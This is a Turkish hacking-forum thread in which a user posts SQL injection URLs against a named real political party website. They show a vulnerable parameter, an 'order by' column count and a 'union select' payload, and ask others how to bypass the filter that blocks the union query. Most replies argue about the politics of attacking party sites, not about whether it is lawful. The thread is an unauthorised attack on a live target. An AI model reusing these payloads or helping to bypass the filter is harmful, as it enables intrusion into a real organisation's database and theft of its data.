akparti.istanbul SQL vuln !

*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
View hidden content is available for registered users!

Kod:
akparti.istanbul/birim.asp?habergetir=3034[SQL vuln]&birim=2
akparti.istanbul/birim.asp?habergetir=3034+order+by+14--&birim=2 (14 de hata yok 15 de var)
akparti.istanbul/birim.asp?habergetir=3034+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--&birim=2(komutu yazınca siteye ulaşılamıyor hatası veriyor döngüye girmiyor)
bunu nasıl bypasslarız yardım edermisiniz özellikle @Adbes reis bi baksan

💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
özelden soracağım kimse yok çünkü kimseyle tanışmadım bi adbes reis var özelden yaz diyen o da daha gelmedi herhalde offline . bende buraya yazdım bilenler çıkarsa öğrenirim diye hem konuya hide özelliği koydum herkes göremez yorum atanlardan birisi yaparsa da kendi bilir

Bence kendini geliştirmek istiyorsan siteye girmeye çalışsan daha çok şey öğrenirsin ve saldırdığın siteler hep bi partinin sitesi kendini geliştirmek için illede o partinin sitesine saldırmana gerek yok ben şuan sqlsini verdiğin partiyi destekliyorum mesela.

Sizin sevdiğiniz parti diye adam paylaşmayacak mı forumlarda böyle bir kural varda biz mi görmedik beyler ? Günlerdir şu herifin üstüne yürüyorsunuz. Siyasi görüşe vs. boş şeylere önem vermeyin yapılan icraate ve foruma olan katkıya bakın.

Beyler isteyen istediği partiyi tutabilir adam Ak partinin bilgilerini verdi diye siyasi anlamda bir icraat de bulunmuş oluyor
anlamına gelmiyor.Ama onunda yaptığı yanlış.Bu tür bir konunun tepki çekeceği belli değilmi.
Ben asla parti tutma ama bir siyasi görüş tarafının sitesinde açık bulmaya çalışıp bilgilendiririm.Ama konu açarsan böyle hışma uğrarsın.
Umarım anlaşılmıştır.Birbirimizi kırmaya değmez.Lütfen.

bu memleketin zihniyeti parti tutmayı fanatizm holiganizm haline getirdikçe zaten o iş yürümez . keşke 2 satır komut girip şu zihniyetleri değiştirebilsek

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
132,177Konular
3,276,211Mesajlar
317,051Kullanıcılar
EnesOz52Son Üye
Üst Alt